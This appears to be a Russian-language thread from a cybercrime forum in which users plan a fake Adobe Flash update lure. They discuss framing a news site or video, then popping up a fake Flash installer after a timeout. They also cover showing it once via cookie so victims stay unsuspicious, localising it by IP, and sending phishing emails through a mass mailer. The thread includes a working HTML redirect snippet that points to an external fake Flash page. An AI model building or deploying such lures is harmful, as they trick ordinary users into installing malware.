• XSS.stack #1 – первый литературный журнал от юзеров форума

Fake Adobe Flash

Отлично, спасибо за инфу и шаринг. Только просьба - ты коротко выкладывай аннотацию, плз - что внутри. Описание, что за софт и т.д. т.п. Неясно, что за линки и что за фейк адоба.

Аdmin добро :D только и сам и порой не понимаю реал по этому от сюда вопрос ребят и чисто спортивный интерес у меня,вот исходное видео тыц но мой варик через веб тыцмне надо чтоб как у меня видео с модалкой,запускался Adobe Flash через несколько секунд вопрос где там выставить в js время в бою чтоб было так человек заходит на сайт смотрит видео и через секунд десять выскакивает Flash... :hi:

Пожалуйста, обратите внимание, что пользователь заблокирован
Так на запуск с фрейма выстави таймаут, допустим 5 сек.
У меня скоро фейк покруче выйдет, оттуда выдернешь. Но там видео ютуб страницы , само видео во фрейме страницы фейка, прерывается через 5 сек, потом видео обрывается и выскакивает фрейм типа твоего с флешем, только там текст можно перевести на все языки (сам фрейм в HTML написан) а не картинкой как у тебя, так что по IP можно свой язык установки фейка флеша определять на серванте и под IP выдавать фейк с нужным языком страны фрейма.
Но у мну ща некск. проектов горит. Хранителю могу древний варик скачанный скинуть, если нужно, но хотелось бы доделать свой вариант с поддержкой куки, которая ставится для только единоразового показа фрейма (чтоб у "рака" не возникло подозрений).

Еще... Хранитель... Скинь мне EML письма то что у тебя на почте для фейка, то что в Прогу рассылки вставлял.
Всем тутошним респект !

так выше тоже стоит ограничения на один показ через js :D ага кто бы сказал как *(Так на запуск с фрейма выстави таймаут, допустим 5 сек.
) вообще тогда тут не тупил мне и надо фрейм по секундам у меня просто другая тема палить не хочу весь затык :D выше просто не правельно на писал что мне надо фрейм выставить чтоб он запускался но тямы то не на все хватает ебт....это не в курил (Скинь мне EML письма то что у тебя на почте для фейка, то что в Прогу рассылки вставлял.) подробней просто не все помню что вчера делал... :lol2:

p.s вот смотри тыц там по клику перекидываем а мне надо чтоб если терпила не кликает через пять секунд появился флеш как-то...

Всем п/т вообщем думал про конверт Adobe все плачут плохой вот подумал х... ебаться выбираем любой почти тыц я так щелкнул самые больше все наши покемоны все выберем канал и ловим тему чтоб в тренде сегодня была бегом сюда тыц ах сука забыл не все на мега exp есть тогда сюда тыц
biggrin.png
это не реклама так на водочка.

p.s можно прям на ролик слать посмотрели сколько минут он х.. выдаем ему Адобушку для обновки
36gif_5947845_29246622.gif
выше ссылка битая по этому вот тыц так самое главное мега код он приватный имейте это ввиду.
Код:
<html>
<head>
<script type="text/javascript">
setTimeout('document.location.href="http://create-wizard.esy.es/warning%20flash%20player/Flash%20Player.html";', 20000);
</script>
<body>
<iframe src="http://www.vesti.ru/" style="width: 100%; height: 960px; border: none;"></iframe>
</body>
</html>

p.s где мой хостинг ставим ссылку на своего адобушку где 20000 секунды все в бой постить новости
36gif_5947845_29246622.gif

Вложения

• 1541406399962.png
    1541406399962.png
    363 байт · Просмотры: 10
xrahitel у тебя хорошие видосы. Но вот от твоей темы оформления реально глаза выплывают. Давно хотел спросить. Тебе самому на ней комфортно?
старик да нормально неделю пью и все как в первый раз ))

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх